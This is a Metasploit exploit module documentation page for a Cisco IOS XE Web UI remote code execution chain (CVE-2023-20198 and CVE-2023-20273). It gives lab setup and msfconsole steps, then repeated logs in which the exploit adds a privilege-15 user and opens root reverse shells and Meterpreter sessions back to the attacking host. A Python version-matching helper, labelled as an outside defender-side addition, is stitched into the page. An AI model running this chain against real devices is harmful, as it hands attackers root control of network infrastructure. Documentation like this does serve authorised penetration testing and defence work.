metasploit-gs/documentation/modules/exploit/linux/misc/cisco_ios_xe_rce.md
2025-07-17 09:53:40 +01:00

Vulnerable Application

This module leverages both CVE-2023-20198 and CVE-2023-20273 against vulnerable instances of Cisco IOS XE devices which have the Web UI exposed. An attacker can execute a payload with root privileges.

The vulnerable IOS XE versions are: 16.1.1, 16.1.2, 16.1.3, 16.2.1, 16.2.2, 16.3.1, 16.3.2, 16.3.3, 16.3.1a, 16.3.4, 16.3.5, 16.3.5b, 16.3.6, 16.3.7, 16.3.8, 16.3.9, 16.3.10, 16.3.11, 16.4.1, 16.4.2, 16.4.3, 16.5.1, 16.5.1a, 16.5.1b, 16.5.2, 16.5.3, 16.6.1, 16.6.2, 16.6.3, 16.6.4, 16.6.5, 16.6.4s, 16.6.4a, 16.6.5a, 16.6.6, 16.6.5b, 16.6.7, 16.6.7a, 16.6.8, 16.6.9, 16.6.10, 16.7.1, 16.7.1a, 16.7.1b, 16.7.2, 16.7.3, 16.7.4, 16.8.1, 16.8.1a, 16.8.1b, 16.8.1s, 16.8.1c, 16.8.1d, 16.8.2, 16.8.1e, 16.8.3, 16.9.1, 16.9.2, 16.9.1a, 16.9.1b, 16.9.1s, 16.9.1c, 16.9.1d, 16.9.3, 16.9.2a, 16.9.2s, 16.9.3h, 16.9.4, 16.9.3s, 16.9.3a, 16.9.4c, 16.9.5, 16.9.5f, 16.9.6, 16.9.7, 16.9.8, 16.9.8a, 16.9.8b, 16.9.8c, 16.10.1, 16.10.1a, 16.10.1b, 16.10.1s, 16.10.1c, 16.10.1e, 16.10.1d, 16.10.2, 16.10.1f, 16.10.1g, 16.10.3, 16.11.1, 16.11.1a, 16.11.1b, 16.11.2, 16.11.1s, 16.11.1c, 16.12.1, 16.12.1s, 16.12.1a, 16.12.1c, 16.12.1w, 16.12.2, 16.12.1y, 16.12.2a, 16.12.3, 16.12.8, 16.12.2s, 16.12.1x, 16.12.1t, 16.12.2t, 16.12.4, 16.12.3s, 16.12.1z, 16.12.3a, 16.12.4a, 16.12.5, 16.12.6, 16.12.1z1, 16.12.5a, 16.12.5b, 16.12.1z2, 16.12.6a, 16.12.7, 16.12.9, 16.12.10, 17.1.1, 17.1.1a, 17.1.1s, 17.1.2, 17.1.1t, 17.1.3, 17.2.1, 17.2.1r, 17.2.1a, 17.2.1v, 17.2.2, 17.2.3, 17.3.1, 17.3.2, 17.3.3, 17.3.1a, 17.3.1w, 17.3.2a, 17.3.1x, 17.3.1z, 17.3.3a, 17.3.4, 17.3.5, 17.3.4a, 17.3.6, 17.3.4b, 17.3.4c, 17.3.5a, 17.3.5b, 17.3.7, 17.3.8, 17.4.1, 17.4.2, 17.4.1a, 17.4.1b, 17.4.1c, 17.4.2a, 17.5.1, 17.5.1a, 17.5.1b, 17.5.1c, 17.6.1, 17.6.2, 17.6.1w, 17.6.1a, 17.6.1x, 17.6.3, 17.6.1y, 17.6.1z, 17.6.3a, 17.6.4, 17.6.1z1, 17.6.5, 17.6.6, 17.7.1, 17.7.1a, 17.7.1b, 17.7.2, 17.10.1, 17.10.1a, 17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3, 17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a, 17.11.99SW

NOTE: A C8000v series appliance running version 17.6.5 was observed not to be vulnerable to CVE-2023-20273, even though that IOS XE version is listed above as vulnerable to CVE-2023-20273.
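Added here as a defender-side example, not code from the module or its documentation: the version that the module's check output and the device banner report is zero-padded (17.03.02), while the list above uses the advisory form (17.3.2). This helper normalizes a banner version into that form and matches it against a caller-supplied set of affected versions; AFFECTED_SAMPLE is a constructed subset for illustration, not the full list.

```python
import re
from typing import Optional

# Constructed subset of the affected versions listed above; a real inventory
# check would pass the complete list (assumption: caller supplies it).
AFFECTED_SAMPLE = {"16.12.3", "17.3.2", "17.6.5", "16.12.1z1", "17.11.99SW"}

# Matches the banner line printed by "show version" and echoed by the module.
_BANNER_RE = re.compile(r"Cisco IOS XE Software, Version\s+(\S+)")


def normalize_version(raw: str) -> str:
    """Strip leading zeros from each numeric component of a banner version
    ('17.03.02' -> '17.3.2', '16.12.01z1' -> '16.12.1z1') while keeping any
    letter suffix, so it can be compared with the advisory-style list."""
    parts = []
    for comp in raw.strip().split("."):
        m = re.fullmatch(r"0*(\d+)(.*)", comp)
        if not m:
            raise ValueError(f"unexpected version component {comp!r}")
        parts.append(m.group(1) + m.group(2))
    return ".".join(parts)


def version_from_banner(text: str) -> Optional[str]:
    """Return the normalized version found in banner/check output, or None."""
    m = _BANNER_RE.search(text)
    return normalize_version(m.group(1)) if m else None


def is_affected(text: str, affected=AFFECTED_SAMPLE) -> Optional[bool]:
    """True if the banner version is in the affected set, False if not,
    None if no version could be parsed (treat None as 'needs manual review',
    never as 'safe'). Note the page's C8000v 17.6.5 observation: a device on
    a listed version is still flagged here; only patching clears it."""
    version = version_from_banner(text)
    if version is None:
        return None
    return version in affected


if __name__ == "__main__":
    # Constructed sample lines in the shape of the module's check output.
    for line in ("Cisco IOS XE Software, Version 17.03.02",
                 "Cisco IOS XE Software, Version 17.12.02"):
        print(line, "->", is_affected(line))
```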

Testing

This module was tested against IOS XE version 16.12.3 and version 17.3.2 running on a CSR1000v appliance. To test this module you will need to either:

  • Acquire a hardware device running one of the vulnerable firmware versions listed above.

Or

  • Set up a virtualized environment.
    • A CSR1000V device can be virtualized using GNS3 and VMware Workstation/Player. Follow the Windows setup guide to install GNS3 and the topology guide to learn how GNS3 can be used.
    • A suitable firmware image for testing would be csr1000v-universalk9.16.12.03-serial.qcow2.
    • When setting up GNS3, run the GNS3 2.2.43 Virtual Machine for deploying QEMU based devices.
    • Create a new CSR1000v instance as a QEMU device.
    • The CSR1000v device's first ethernet adapter Gi1 should be connected to a Cloud device whose adapter is bridged to the physical adapter on the host machine, allowing an IP address to be assigned via DHCP and the Web UI to be reached from the attacking host.
    • When the virtual router has booted up, you must enable the vulnerable WebUI component. From a serial console on the device:
      Router>enable
      Router#config
      Router(config)#ip http server
      Router(config)#ip http secure-server
      Router(config)#ip http authentication local
      Router(config)#username admin privilege 15 secret qwerty
      Router(config)#exit
      Router#copy running-config startup-config

    • You should now be able to access the WebUI via https://TARGET_IP_ADDRESS/webui and log in with admin:qwerty

Verification Steps

  1. Start msfconsole
  2. use exploit/linux/misc/cisco_ios_xe_rce
  3. set RHOST <TARGET_IP_ADDRESS>
  4. set target 0
  5. set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
  6. check
  7. exploit

Options

CISCO_VRF_NAME

The VRF name used to route traffic for the payload's network transport. The default of 'global' should work, but exposing this as an option allows the module to be used in more complex network setups. The auxiliary module auxiliary/admin/http/cisco_ios_xe_cli_exec_cve_2023_20198 can be used to inspect a device's configuration and identify an appropriate VRF.

CISCO_CMD_TIMEOUT

A command may need to be executed a second time if it fails the first time. This option is the maximum number of seconds to keep retrying.

Scenarios

To support a broad set of available payloads, the module offers both a Linux target and a Unix target (IOS XE is Linux based). This allows native Linux payloads to be used, as well as payloads such as the Python Meterpreter or a Bash shell.

Linux Command (IOS XE 17.3.2)

msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.113   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      vsLOEPPqU        no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'vTakCDWG' with password 'RJQHKnKK'
[*] Removing user 'vTakCDWG'
[*] Sending stage (3045380 bytes) to 192.168.86.113
[*] Meterpreter session 5 opened (192.168.86.122:4444 -> 192.168.86.113:56702) at 2025-03-03 20:31:39 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : testc100v
OS           :  (Linux 4.19.106)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'VltpvRrx' with password 'KDJGXORf'
[*] Removing user 'VltpvRrx'
[*] Sending stage (38 bytes) to 192.168.86.113
[*] Command shell session 6 opened (192.168.86.122:4444 -> 192.168.86.113:56736) at 2025-03-03 20:32:52 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 6 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 

Linux Command (IOS XE 16.12.3)

msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options 

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
   FETCH_FILELESS  false            yes       Attempt to run payload without touching disk, Linux ≥3.17 only
   FETCH_SRVHOST                    no        Local IP to use for serving payload
   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
   FETCH_URIPATH                    no        Local URI to use for serving payload
   LHOST           eth0             yes       The listen address (an interface may be specified)
   LPORT           4444             yes       The listen port


   When FETCH_FILELESS is false:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_FILENAME      UoDekiVI         no        Name to use on remote system when storing payload; cannot contain spaces or slashes
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check 
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'XpJaBQIt' with password 'qEBrzlDh'
[*] Removing user 'XpJaBQIt'
[*] Sending stage (3045380 bytes) to 192.168.86.114
[*] Meterpreter session 7 opened (192.168.86.122:4444 -> 192.168.86.114:61922) at 2025-03-03 20:34:05 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : test2_c1000v
OS           :  (Linux 4.19.64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 0
target => 0
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/linux/http/x64/shell/reverse_tcp
payload => cmd/linux/http/x64/shell/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vmoCbNcA' with password 'UgDnLaCG'
[*] Removing user 'vmoCbNcA'
[*] Sending stage (38 bytes) to 192.168.86.114
[*] Command shell session 8 opened (192.168.86.122:4444 -> 192.168.86.114:61940) at 2025-03-03 20:34:58 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 8 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 

Unix Target (IOS XE 17.3.2)

msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'edGjwUsF' with password 'hhOLNNrX'
[*] Removing user 'edGjwUsF'
[*] Sending stage (24772 bytes) to 192.168.86.113
[*] Meterpreter session 9 opened (192.168.86.122:4444 -> 192.168.86.113:56770) at 2025-03-03 20:36:00 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : testc100v
OS           : Linux 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020
Architecture : x64
Meterpreter  : python/linux
meterpreter > 
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.03.02
[*] Created privilege 15 user 'mXsKBwvG' with password 'gCUirrkj'
[*] Removing user 'mXsKBwvG'
[*] Command shell session 10 opened (192.168.86.122:4444 -> 192.168.86.113:56802) at 2025-03-03 20:36:39 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux testc100v 4.19.106 #1 SMP Fri Oct 2 17:55:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.113 - Command shell session 10 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) > 

Unix Target (IOS XE 16.12.3)

msf exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf exploit(linux/misc/cisco_ios_xe_rce) > set target 1
target => 1
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf exploit(linux/misc/cisco_ios_xe_rce) > show options 

Module options (exploit/linux/misc/cisco_ios_xe_rce):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   CISCO_CMD_TIMEOUT  30               yes       The maximum timeout (in seconds) to wait when trying to execute a command.
   CISCO_VRF_NAME     global           yes       The virtual routing and forwarding (vrf) name to use. Both 'fwd' or 'global' have been tested to work.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS             192.168.86.114   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT              443              yes       The target port (TCP)
   SSL                true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                               no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  eth0             yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Unix Command



View the full module info with the info, or info -d command.

msf exploit(linux/misc/cisco_ios_xe_rce) > check 
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'vhQbLuix' with password 'JAjuUVov'
[*] Removing user 'vhQbLuix'
[*] Sending stage (24772 bytes) to 192.168.86.114
[*] Meterpreter session 11 opened (192.168.86.122:4444 -> 192.168.86.114:61966) at 2025-03-03 20:37:36 +0000

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : test2_c1000v
OS           : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
Architecture : x64
Meterpreter  : python/linux
meterpreter >
msf exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
[*] Created privilege 15 user 'JJgILIEn' with password 'EkMpGWih'
[*] Removing user 'JJgILIEn'
[*] Command shell session 12 opened (192.168.86.122:4444 -> 192.168.86.114:61982) at 2025-03-03 20:38:16 +0000

id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
uname -a
Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
exit
[*] 192.168.86.114 - Command shell session 12 closed.
msf exploit(linux/misc/cisco_ios_xe_rce) >